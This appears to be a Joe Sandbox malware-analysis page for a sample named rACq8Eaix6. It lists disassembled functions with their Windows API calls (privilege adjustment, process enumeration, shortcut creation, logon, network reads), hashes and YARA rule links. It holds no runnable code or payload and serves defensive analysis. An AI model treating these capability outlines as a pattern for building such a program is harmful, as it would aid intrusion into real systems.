Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: bdd3701cb3f26efded81d8b88a367ccba9ee59e70d75a08f56fc1c2ebddc2e47
Instruction ID: 7ab88940ddbf868af31a32a1cb27a10486cb0f757ef6942ea4e0e573bbb5549d
Opcode Fuzzy Hash: bdd3701cb3f26efded81d8b88a367ccba9ee59e70d75a08f56fc1c2ebddc2e47
Instruction Fuzzy Hash: 15F0C234206314AFEB100FA4EC8CF6F3BACEF89756B040029F945D3190CF609D96EA60

Function 00C3C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C3C432
CoCreateInstance.OLE32(00C62D6C,00000000,00000001,00C62BDC,?), ref: 00C3C44A

Part of subcall function 00BD7DE1: _memmove.LIBCMT ref: 00BD7E22

CoUninitialize.OLE32 ref: 00C3C6B7

Strings

.lnk, xrefs: 00C3C3C6, 00C3C3EE, 00C3C3F8

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 4ba301990f6428ef22c11e8e2525437d663daf511d2e794a894553686ff9e797
Instruction ID: bdb5dcee52b9a172e94ccdf4c8e3a0a3c3f7cdd8acfeac288c59b4bc5047f6da
Opcode Fuzzy Hash: 4ba301990f6428ef22c11e8e2525437d663daf511d2e794a894553686ff9e797
Instruction Fuzzy Hash: 1CA14BB1104205AFD700EF54C881EAFB7E8FF95354F00496DF1959B2A2EB71EA49CB62

Function 00BD4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00BD4AD0), ref: 00BD4B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00BD4B57

Strings

GetNativeSystemInfo, xrefs: 00BD4B51
kernel32.dll, xrefs: 00BD4B40

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: dc17c32367a84015f14004ac06cc1de6fb51c1d9cfa4489d0c1e23a8715d39df
Instruction ID: 119461f81876e84fa151d40c90be3c40b14bf2d0b9363eabf232476a3ce50ac3
Opcode Fuzzy Hash: dc17c32367a84015f14004ac06cc1de6fb51c1d9cfa4489d0c1e23a8715d39df
Instruction Fuzzy Hash: E2D01239A10713CFD7249F31D818B0AB6D4EF15352B11887F98C5D6250E770D4C1C658

Function 00BE3030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 6891f69bd79ae9ee9beae533b7e9079d22b206373d3998a243b80237d20c3374
Instruction ID: 7070b180d6efc45d9114ae7c9999236c954d401b9ce4bfe82d5471861a471fdd
Opcode Fuzzy Hash: 6891f69bd79ae9ee9beae533b7e9079d22b206373d3998a243b80237d20c3374
Instruction Fuzzy Hash: 312299716083409FC724DF25C891BAEB7E4EF85B10F00496DF99A97391EB71EA44CB92

Function 00C4EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00C4EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 00C4EE4B

Part of subcall function 00BD7DE1: _memmove.LIBCMT ref: 00BD7E22

Process32NextW.KERNEL32(00000000,?), ref: 00C4EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00C4EF1A

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 65cd254ffe04d8ffcdd988257989d27a52c485d65953553c38ee1eed0a94c496
Instruction ID: dd5f520cb43ac5150d2a3970c83f22cfe4a3288647fc1cf82b1e0789f9ee7889
Opcode Fuzzy Hash: 65cd254ffe04d8ffcdd988257989d27a52c485d65953553c38ee1eed0a94c496
Instruction Fuzzy Hash: 16517B71504711ABD320EF24DC81EAFB7E8FF94750F00486EF595962A1EB70A909CB92

Function 00C2E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C2E628

Strings

(, xrefs: 00C2E66E
|, xrefs: 00C2E658

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 78bf99e2977be996cbaabd528c3ff898b605258fbec39b74479e7899c270c986
Instruction ID: 6e82b299056c292d1f358468aa45508de511f22c42f95bd62baca8420f38fbc2
Opcode Fuzzy Hash: 78bf99e2977be996cbaabd528c3ff898b605258fbec39b74479e7899c270c986
Instruction Fuzzy Hash: BA323575A007159FDB28DF19D4809AAB7F0FF48320B15C46EE8AADB7A1E770A941CB44

Function 00C422EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C4180A,00000000), ref: 00C423E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00C42418

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 6e29b1cfc37d0ac87e4bcd5a25b9c17fee932bdf4107895547263b3e7668b23c
Instruction ID: 03135694728fbf13c2e63fb8c3a072b4be8938a9596752f5f6beb00ceae147ac
Opcode Fuzzy Hash: 6e29b1cfc37d0ac87e4bcd5a25b9c17fee932bdf4107895547263b3e7668b23c
Instruction Fuzzy Hash: 7A41D371904209BFEB209E95DC82FBFB7BCFB40324F50406AFA51A7151DA749E41A660

Function 00C3B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C3B40B
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C3B465
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00C3B4B2

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 190f3fd5a5d90b6cb88b693f59cbd78c8e86c41be341f820c06b73a6ac662905
Instruction ID: 24bd561f031dc867ee599b67e1b0520406a6f7ad4e78ce57c1adf9b578027a59
Opcode Fuzzy Hash: 190f3fd5a5d90b6cb88b693f59cbd78c8e86c41be341f820c06b73a6ac662905
Instruction Fuzzy Hash: F2215135A00508DFCB00EF95D880AEDFBB8FF49310F1480AAE905AB351DB319955DB55

Function 00C287E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00BF0DB6: std::exception::exception.LIBCMT ref: 00BF0DEC
Part of subcall function 00BF0DB6: __CxxThrowException@8.LIBCMT ref: 00BF0E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C2882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C28858
GetLastError.KERNEL32 ref: 00C28865

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: d4e5f4f68b8fbc10e6e208ea7812a20c3d3deef3887853b3f99758e1f7ebf06b
Instruction ID: 05cd177ccd369f2abefeab8d98a525d29d7736ecdd9e77cee42233fbb2eee49b
Opcode Fuzzy Hash: d4e5f4f68b8fbc10e6e208ea7812a20c3d3deef3887853b3f99758e1f7ebf06b
Instruction Fuzzy Hash: D311BFB2814304AFE718EFA4EC85E2BB7F8EB44311B24856EF45593691EB70BC458B60

Function 00C2874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00C28774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C2878B
FreeSid.ADVAPI32(?), ref: 00C2879B

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 4ab025188d814aa4dbb3a8dbd78c94eb9ff49b1172138d87d8f3971a85eb2dc7
Instruction ID: 6d796fa45656fa4e0b2403ad8e2e768434f3ea57de3c3ef7f8243e9cddb9c033
Opcode Fuzzy Hash: 4ab025188d814aa4dbb3a8dbd78c94eb9ff49b1172138d87d8f3971a85eb2dc7
Instruction Fuzzy Hash: 39F04F7591130CBFDF04DFF4DC89AAEB7BCEF08211F104469A901E2181D7755A448B50

Function 00C3C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C3C6FB
FindClose.KERNEL32(00000000), ref: 00C3C72B

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 27813faa21772e92248b0190b4f74bdb6443390ec60e2b0564ee3abf832708cc
Instruction ID: 83a220feab49d656d42e30c283b42d6db65b0e4f0d2615d5b62480f964190142
Opcode Fuzzy Hash: 27813faa21772e92248b0190b4f74bdb6443390ec60e2b0564ee3abf832708cc
Instruction Fuzzy Hash: 53118B766006009FDB10EF29D885A2EF7E8EF85361F00855EF9A9D73A0DB30A801CB81

Function 00C3A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00C49468,?,00C5FB84,?), ref: 00C3A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00C49468,?,00C5FB84,?), ref: 00C3A0A9

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 9bcb6b9029d8f5260fe2024a650885f9e2165d4f366a1cb1004fa0ec080da610
Instruction ID: 5fbd87123f45c5f527812cae1cf60ba7ae4b1b811f131cb2ce995f3b517facf5
Opcode Fuzzy Hash: 9bcb6b9029d8f5260fe2024a650885f9e2165d4f366a1cb1004fa0ec080da610
Instruction Fuzzy Hash: 0CF0E23510432DABDB20AFA4CC48FEE736CBF08361F00416AF949D3180DA309A40CBA1

Function 00C281CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C28309), ref: 00C281E0
CloseHandle.KERNEL32(?,?,00C28309), ref: 00C281F2

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 6c832081d9e19c4e514399eb28170e2be5ceb4b563edc4cce43b0dc9c8db0659
Instruction ID: 77e7880b988597b3bfecf5d3f439780d75ada76f7a9a7bd36da27f1609720711
Opcode Fuzzy Hash: 6c832081d9e19c4e514399eb28170e2be5ceb4b563edc4cce43b0dc9c8db0659
Instruction Fuzzy Hash: 38E08631411610AFE7253B20FC04E7777E9EF04311714886DF56581871CB615C91DB10

Function 00BFA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00BF8D57,?,?,?,00000001), ref: 00BFA15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00BFA163

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 040c626cfcacb135308655a2e532f1910badcb173871e7b6e6704153f36292e6
Instruction ID: 0c1de186bbfcee61d8be91b408fe9793c2b21cea8d9ab265f3887a526495c92f
Opcode Fuzzy Hash: 040c626cfcacb135308655a2e532f1910badcb173871e7b6e6704153f36292e6
Instruction Fuzzy Hash: 08B09235054308ABEA042F91ED09B8D3F68EB44AA3F404024F60D94070CB6254928A91

Function 00BFF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00c0113f7d1b3a2ddcb744ceeea27c818112d557231e182996739a83f43527ca
Instruction ID: 1d23ee0f887a7211dcb6a1974f66265b423943d9f3aa003f27092e3596b0fa7d
Opcode Fuzzy Hash: 00c0113f7d1b3a2ddcb744ceeea27c818112d557231e182996739a83f43527ca
Instruction Fuzzy Hash: 8D321521D29F064ED7239635C872339A289EFB73C8F15D737F819B6AA5EB68C4834100

Function 00C0242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbad2093e51d16831e2f4e36bba38cea8d8c5732783ece3a7572fbf683e18047
Instruction ID: b9aa142e930539eaa1056452dd3ba8ef62685b414140c433b619dd9a4c95928e
Opcode Fuzzy Hash: bbad2093e51d16831e2f4e36bba38cea8d8c5732783ece3a7572fbf683e18047
Instruction Fuzzy Hash: B7B10230D2AF404DD323963A883533AB65CAFBB2C5F51E71BFC2674E62EB6285834541

Function 01819151 Relevance: 1.8, Strings: 1, Instructions: 514COMMON

Download Yara Rule

Strings

%, xrefs: 01819AB6

Memory Dump Source

Source File: 00000000.00000002.2096230854.0000000001819000.00000040.00000020.00020000.00000000.sdmp, Offset: 01819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1819000_rACq8Eaix6.jbxd

Similarity

API ID:
String ID: %
API String ID: 0-2567322570
Opcode ID: fbd5d88ea55e3c903f0384277a8bfd33729941550b301270d4982a2ee65979df
Instruction ID: ee94fa1babdd12efd25f1641a4c19dc8a20fad1f7a6d2b2f68ff8d7115c2a352
Opcode Fuzzy Hash: fbd5d88ea55e3c903f0384277a8bfd33729941550b301270d4982a2ee65979df
Instruction Fuzzy Hash: 86424530919359CFDB60CF68C8847C9BBB1FF59310F6085EAC048AB266E7355A96CF19

Function 00C38889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00C3889B

Part of subcall function 00BF520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00C38F6E,00000000,?,?,?,?,00C3911F,00000000,?), ref: 00BF5213
Part of subcall function 00BF520A: __aulldiv.LIBCMT ref: 00BF5233

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: b92a960dc3c9d99972a42d4a8c4a5f69727acf6ce21f7b1fee9b908809b5c245
Instruction ID: 26812e544b578aad254cd9ae7d9bbeee421581598c91ff1c0856143e9c066b65
Opcode Fuzzy Hash: b92a960dc3c9d99972a42d4a8c4a5f69727acf6ce21f7b1fee9b908809b5c245
Instruction Fuzzy Hash: 4B21DF32635610CBC729CF29D841B56B3E1EBA4310F298E6CE1F5CB2D0CA34AA09CB54

Function 00C34C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00C34C76

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 8b335755945c449caf4abe01575a236291870b82c1b277320c95561d45d6cdc0
Instruction ID: 9c05f8409bf03e7d9f5708932929ad97b0b2a25849c5bb8c0ddb9dae222936c4
Opcode Fuzzy Hash: 8b335755945c449caf4abe01575a236291870b82c1b277320c95561d45d6cdc0
Instruction Fuzzy Hash: C6D09EA417261979EC2C0720AE5BFBA1109F380795FDCA54A7251951C1E8DC7D41E035

Function 00C287B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C28389), ref: 00C287D1

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
